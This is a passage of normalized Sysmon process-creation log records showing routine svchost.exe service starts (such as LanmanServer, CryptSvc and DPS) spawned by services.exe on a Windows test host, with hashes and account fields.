"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0681558Z\"},\"EventRecordID\":\"27632\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.271\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-001074830100}\"},{\"Name\":\"ProcessId\",\"text\":\"2772\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s SstpSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s SstpSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-001074830100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2772", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.271Z", "type": "raw", "uuid": "b231eb5a-62ea-4d39-9274-4d267703e647"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0655304Z\"},\"EventRecordID\":\"27628\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.238\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010a7800100}\"},{\"Name\":\"ProcessId\",\"text\":\"2736\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s LanmanServer\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s LanmanServer", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010a7800100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2736", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.238Z", "type": "raw", "uuid": "afeb750a-0a83-4ca6-bba1-e5f3adf22fa6"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0633563Z\"},\"EventRecordID\":\"27623\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.221\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010de7e0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2704\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNoNetwork -p -s DPS\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNoNetwork -p -s DPS", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010de7e0100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2704", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.221Z", "type": "raw", "uuid": "c0e73939-85f2-4997-883a-1b49bbc7af91"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0149988Z\"},\"EventRecordID\":\"27619\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.166\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010067a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k utcsvc -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k utcsvc -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010067a0100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2640", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.166Z", "type": "raw", "uuid": "1c48105f-5c05-40af-baa1-9a33eee6d69d"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.9705336Z\"},\"EventRecordID\":\"27618\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.165\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010a4790100}\"},{\"Name\":\"ProcessId\",\"text\":\"2632\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k NetworkService -p -s CryptSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k NetworkService -p -s CryptSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010a4790100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2632", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.165Z", "type": "raw", "uuid": "7e01fbd4-c338-47fe-a4bf-913348aeff57"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.8551010Z\"},\"EventRecordID\":\"27606\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.068\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-001046700100}\"},{\"Name\":\"ProcessId\",\"text\":\"2496\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s IKEEXT\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 